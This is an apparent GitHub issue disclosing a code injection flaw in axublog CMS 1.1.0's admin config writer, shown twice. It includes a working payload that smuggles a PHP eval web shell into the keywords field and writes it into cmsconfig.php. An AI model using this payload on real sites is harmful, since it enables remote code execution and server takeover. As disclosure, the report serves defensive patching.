axublogcms1.1.0 the latest version Getshell
Code Execution Vulnerability, Backstage write configuration file.
you can download the lastest version from it (pic.axublog.com/axublog1.1.0install.rar)
./ad/setconfig.php
Directly replace the submitted parameter $webkeywords without any escaping behavior.
So, here we can write a sentence. Seen in the 97 row, the../cmsconfig.php file is included directly, so the written word is written directly into the cmsconfig.php file.
Insert a sentence at the key word. Here we need to close the front webkeywords and close the double quotation marks, otherwise the incomplete PHP files will not run.
For example, 123456 "; @eval ($_POST['a']); $a="
The text was updated successfully, but these errors were encountered:
axublogcms1.1.0 the latest version Getshell





Code Execution Vulnerability, Backstage write configuration file.
you can download the lastest version from it (pic.axublog.com/axublog1.1.0install.rar)
./ad/setconfig.php
Directly replace the submitted parameter $webkeywords without any escaping behavior.
So, here we can write a sentence. Seen in the 97 row, the../cmsconfig.php file is included directly, so the written word is written directly into the cmsconfig.php file.
Insert a sentence at the key word. Here we need to close the front webkeywords and close the double quotation marks, otherwise the incomplete PHP files will not run.
For example, 123456 "; @eval ($_POST['a']); $a="
The text was updated successfully, but these errors were encountered: